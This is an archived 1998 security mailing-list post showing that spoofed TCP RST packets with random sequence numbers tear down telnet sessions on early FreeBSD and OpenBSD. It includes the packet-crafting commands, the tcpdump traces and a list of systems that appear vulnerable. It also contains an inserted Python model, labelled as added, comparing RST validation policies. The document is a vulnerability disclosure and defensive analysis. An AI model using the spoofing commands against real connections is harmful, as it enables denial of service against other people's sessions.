Re: FreeBSD's RST validation

From: Oliver Friedrichs (oliverat_private)
Date: Mon Aug 31 1998 - 12:36:35 PDT


    Darren Reed brought this up in June, 1997, on the NetBSD security list,
    after which I performed some tests.  I ended up with a number of
    questions after doing this, but never followed up to determine what was
    going on.
    
    Anyways, here's my old message
    
    - Oliver
      Network Associates, Inc.
    
    ------
    
    Ok, here's how my tests turned out:
    
    I have 3 systems involved:
    
    199.185.231.20 - OpenBSD system
    199.185.231.24 - FreeBSD system
    199.185.231.25 - BSDI system
    
    I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from
    the OpenBSD system using tcpdump and CAPE.
    
    20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
    20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]
    
    So I'm logged into FreeBSD from port 3349 on the BSDI system.  On OpenBSD..
    
    bash# ./cape -i
    Welcome to CAPE.  "help" for general help, "help topic" for help on topic
    
    Active network interfaces:
       - Interface: lo0 Address: 127.0.0.1
       - Interface: ed2 Address: 199.185.231.20
    
    cape> iface=ed2
    cape> gateway=199.185.231.24
    cape> ip
    cape> ip_src=199.185.231.23
    cape> ip_dst=199.185.231.24
    cape> ip_proto=IPPROTO_TCP
    cape> tcp
    cape> tcp_sport=3349
    cape> tcp_dport=23
    cape> tcp_flags=RST
    cape> send
    Processing: Packet transmitted
    
    Here's my spoofed packet with random seq/ack numbers:
    
    20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096
    
    As soon as I hit a key on the FreeBSD system...
    
    [20:25:01] [freebsd]
    [/usr/local/scanner] % Connection closed by foreign host.
    
    Poof, it works, repeatable every time.  This works when spoofing the
    packet from the BSDI system TO the FreeBSD system.  For some reason
    (which I've been unable to figure out yet), I cannot spoof packets
    from the FreeBSD system to the BSDI system and have this work.
    This works between OpenBSD and FreeBSD however (both ways).
    This doesn't work against Solaris.
    
    Here's what I found with the systems here:
    
    OpenBSD 2.1 - vulnerable
    FreeBSD 2.1.x - vulnerable
    BSDI        - appears not vulnerable (?)
    Solaris 2.5 - appears not vulnerable
    IRIX    6.2 - appears not vulnerable
    Linux       - appears not vulnerable
    Windows NT  - appears not vulnerable
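The distinction the post observes between hosts that accept any RST on a matching 4-tuple and hosts that do not is the receive-window check. The following is an added example, not code from the original message or from any of the BSD stacks it tests: it models three RST-handling policies (no sequence check, the RFC 793 in-window check, and the stricter RFC 5961 variant that answers an in-window but off-by-some RST with a challenge ACK) and applies them to values taken from the tcpdump lines above. The connection state (RCV.NXT, RCV.WND) is reconstructed from those lines and is an assumption.

```python
"""RST acceptance policies for an ESTABLISHED TCP connection."""
from enum import Enum

SEQ_SPACE = 1 << 32  # sequence numbers are 32-bit; compare modulo 2^32


class RstAction(Enum):
    RESET = "tear down connection"
    CHALLENGE_ACK = "send challenge ACK, keep connection"
    DROP = "discard segment"


def seq_in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """RFC 793 acceptability for a zero-length segment:
    RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND (modulo 2^32).
    With a zero window only SEG.SEQ == RCV.NXT is acceptable."""
    if rcv_wnd == 0:
        return seq == rcv_nxt
    return (seq - rcv_nxt) % SEQ_SPACE < rcv_wnd


def rst_no_check(seq: int, rcv_nxt: int, rcv_wnd: int) -> RstAction:
    """Behaviour the post observed on FreeBSD 2.1.x / OpenBSD 2.1:
    any RST whose ports and addresses match kills the connection."""
    return RstAction.RESET


def rst_rfc793(seq: int, rcv_nxt: int, rcv_wnd: int) -> RstAction:
    """Accept the RST only if its sequence number is inside the window."""
    return RstAction.RESET if seq_in_window(seq, rcv_nxt, rcv_wnd) else RstAction.DROP


def rst_rfc5961(seq: int, rcv_nxt: int, rcv_wnd: int) -> RstAction:
    """Exact match resets; in-window but inexact gets a challenge ACK;
    anything else is dropped."""
    if seq == rcv_nxt:
        return RstAction.RESET
    if seq_in_window(seq, rcv_nxt, rcv_wnd):
        return RstAction.CHALLENGE_ACK
    return RstAction.DROP


# Constructed from the post's tcpdump output (assumed connection state):
# BSDI sent 1 byte at seq 2752239993, so FreeBSD's RCV.NXT is 2752239994;
# FreeBSD advertised win 17376; the spoofed RST carried seq 1649760492.
RCV_NXT, RCV_WND, SPOOFED_RST_SEQ = 2752239994, 17376, 1649760492
POLICIES = {"no_check": rst_no_check, "rfc793": rst_rfc793, "rfc5961": rst_rfc5961}


def evaluate_spoofed_rst() -> dict:
    """What each policy does with the random-sequence RST from the post."""
    return {name: fn(SPOOFED_RST_SEQ, RCV_NXT, RCV_WND) for name, fn in POLICIES.items()}


if __name__ == "__main__":
    for name, action in evaluate_spoofed_rst().items():
        print(f"{name:9s} -> {action.value}")
```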
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:31 PDT